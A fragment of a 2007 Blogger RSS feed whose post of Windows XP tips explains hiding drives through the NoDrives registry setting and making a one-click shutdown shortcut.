lines</description><link>http://kwtb.blogspot.com/2007/12/nokia-mobile-tricks.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-8476453220181940228</guid><pubDate>Wed, 28 Nov 2007 18:06:00 +0000</pubDate><atom:updated>2007-11-28T23:47:42.381+05:30</atom:updated><title>XP TWEAKS!!</title><description>&lt;a href=&quot;http://tricksandtipsforu.blogspot.com/2007/11/hide-ur-drives.html&quot;&gt;Hide ur drives&lt;/a&gt;&lt;br /&gt;How to Hide the drives(c:,d:,e:,a:...etc)&lt;br /&gt;How to Hide the drives(c:,d:,e:,a:...etc)&lt;br /&gt;This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.&lt;br /&gt;1.Go to start-&gt;run.Type regedit.Now go to:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNow in the right pane create a new DWORD item and name it NoDrives(it is case sensitive). Now modify it&#39;s value and set it to 3FFFFFF (Hexadecimal) .Now restart your computer. So, now when you click on My Computer, no drives will be shown(all gone...). To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again. Magic........lol....&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://tricksandtipsforu.blogspot.com/2007/11/shutdown-ur-pc-in-one-click.html&quot;&gt;SHUTDOWN UR PC IN ONE CLICK&lt;/a&gt;&lt;br /&gt;Creating Shutdown Icon or One Click Shutdown:&lt;br /&gt;Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut).&lt;br /&gt;You should now see a pop-up window instructing you to enter a command line path.Use this path in &quot;Type Location of the Item&quot;SHUTDOWN -s -t 01&lt;br /&gt;If the C: drive is not your local hard drive, then replace &quot;C&quot; with the correct letter of the hard drive.&lt;br /&gt;Click the &quot;Next&quot; button.&lt;br /&gt;Name the shortcut and click the &quot;Finish&quot; button.&lt;br /&gt; Now whenever you want to shut down, just click on this shortcut and you&#39;re done.......</description><link>http://kwtb.blogspot.com/2007/11/xp-tweaks.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item></channel></rss>